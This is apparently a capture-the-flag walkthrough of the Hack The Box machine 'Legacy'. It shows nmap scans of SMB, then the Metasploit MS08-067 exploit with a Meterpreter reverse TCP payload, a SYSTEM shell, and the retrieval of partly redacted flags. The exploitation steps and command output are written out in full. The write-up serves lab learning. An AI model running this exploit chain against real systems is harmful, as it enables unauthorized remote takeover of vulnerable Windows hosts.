Box Info
  • Name: Legacy
  • OS: Windows
  • Difficulty: Easy
  • Machine Creator: ch4p

Introduction

Legacy is a relatively easy box which has SMB running on Windows XP(2000) OS. We find the exploit with metasploit and get access to priviledged user NT AUTHORITY\SYSTEM directly.

Scanning and Information Gathering

Nmap Scan

nmap -p- -T4 -min-rate=1000 -oN 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:40:41 2022 as: nmap -p- -T4 -min-rate=1000 -oN ports.out 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Fri Jun  3 15:42:09 2022 -- 1 IP address (1 host up) scanned in 87.81 seconds
nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
# Nmap 7.80 scan initiated Fri Jun  3 15:43:24 2022 as: nmap -sC -sV -v -oN nmap.out -p 135,139,445 -Pn 10.129.227.181
Nmap scan report for 10.129.227.181
Host is up (0.14s latency).

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:dc:06 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-08T20:41:24+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun  3 15:44:35 2022 -- 1 IP address (1 host up) scanned in 71.43 seconds

Exploiting

We will be using 139,445 - Pentesting SMB from hacktricks 1

Using msf2 we search for an exploit for: SMB, windows 2000

Using exploit/windows/smb/ms08_067_netapi as it mentions Rank: great and Check: Yes.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.139     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.139:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.227.181
[*] Meterpreter session 3 opened (10.10.14.139:4444 -> 10.129.227.181:1036) at 2022-06-03 16:19:32 +0000

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We have 2 users

meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2017-03-16 06:07:21 +0000  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 05:29:48 +0000  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:37 +0000  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:52 +0000  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 05:32:43 +0000  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 05:33:42 +0000  john

We get user flag at C:\Documents and Settings\john\Desktop

meterpreter > pwd
C:\Documents and Settings\john\Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt

meterpreter > cat user.txt
e69a███████████████████████7644f

And Administrator flag at C:\Documents and Settings\Administrator\Desktop

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt

meterpreter > cat root.txt
9934███████████████████████d5713